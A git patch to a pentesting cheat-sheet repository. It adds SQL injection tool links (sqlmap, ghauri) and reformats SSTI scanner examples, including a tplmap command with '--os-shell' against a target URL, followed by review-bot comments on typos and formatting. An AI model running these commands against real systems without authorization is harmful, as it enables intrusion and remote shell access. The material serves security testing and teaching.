From 97cfeee270395a838802fa1fcb8a4d5ffc6d6b48 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 21 Jan 2024 21:39:23 +0100 Subject: [PATCH] Tools Update --- SQL Injection/README.md | 6 +++ Server Side Template Injection/README.md | 48 ++++++++++-------------- 2 files changed, 25 insertions(+), 29 deletions(-) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index b682947..3705869 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -46,6 +46,12 @@ Attempting to manipulate SQL queries may have goals including: * [Case modification](#case-modification) +## Tools + +* [sqlmapproject/sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool +* [r0oth3x49/ghauri](https://github.com/r0oth3x49/ghauri) - An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws + + ## Entry point detection Detection of an SQL injection entry point diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index a3c6acb..084237e 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md 
@@ -82,44 +82,34 @@ - [PHP - Plates](#plates) - [References](#references) + ## Tools -Recommended tools: +* [TInjA](https://github.com/Hackmanit/TInjA) - An effiecient SSTI + CSTI scanner which utilizes novel polyglots + ```bash + tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..." + tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..." + ``` -[TInjA](https://github.com/Hackmanit/TInjA) - An effiecient SSTI + CSTI scanner which utilizes novel polyglots +* [Tplmap](https://github.com/epinna/tplmap) - Server-Side Template Injection and Code Injection Detection and Exploitation Tool + ```powershell + python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell + python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link" + python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade + ``` -e.g: - -```bash -tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..." -tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..." 
-``` - -[Tplmap](https://github.com/epinna/tplmap) - Server-Side Template Injection and Code Injection Detection and Exploitation Tool - -e.g: - -```powershell -python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell -python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link" -python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade -``` - -[SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [Tplmap](https://github.com/epinna/tplmap) - -e.g: - -```powershell -python3 ./sstimap.py -u 'https://example.com/page?name=John' -s -python3 ./sstimap.py -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e jade -python3 ./sstimap.py -i -A -m POST -l 5 -H 'Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk' -``` +* [SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [Tplmap](https://github.com/epinna/tplmap) + ```powershell + python3 ./sstimap.py -u 'https://example.com/page?name=John' -s + python3 ./sstimap.py -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e jade + python3 ./sstimap.py -i -A -m POST -l 5 -H 'Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk' + ``` ## Methodology ![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/serverside.png?raw=true) ---- + ## Detection In most cases, this polyglot payload will trigger an error in presence of a SSTI vulnerability :
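Review bot: The new "## Tools" section in SQL Injection/README.md is not reachable from the file's own summary list. The hunk inserts the heading right after "* [Case modification](#case-modification)", which is the last entry of the summary, but adds no matching "* [Tools](#tools)" item, so the section is the only one in the README without a summary link. Suggest adding that entry to the list, and dropping one of the two blank "+" lines before "## Entry point detection" so the spacing matches the single blank line used between the other sections.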
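Review bot: The Server Side Template Injection hunk carries over the typo "effiecient" in the TInjA bullet unchanged; since the line is rewritten anyway, it should read "An efficient SSTI + CSTI scanner which utilizes novel polyglots". The fence tags are also inconsistent within the same list: the TInjA block is tagged `bash`, while the Tplmap and SSTImap blocks are tagged `powershell` even though they show `python2.7 ./tplmap.py ...` and `python3 ./sstimap.py ...` invocations with single-quoted arguments, which is shell syntax; tagging all three blocks `bash` would give consistent highlighting. Finally, the "---" separator before "## Detection" is replaced by a blank line, so the Methodology image is no longer visually separated from the Detection section; if the rule was intentional elsewhere in the file, keep it here too.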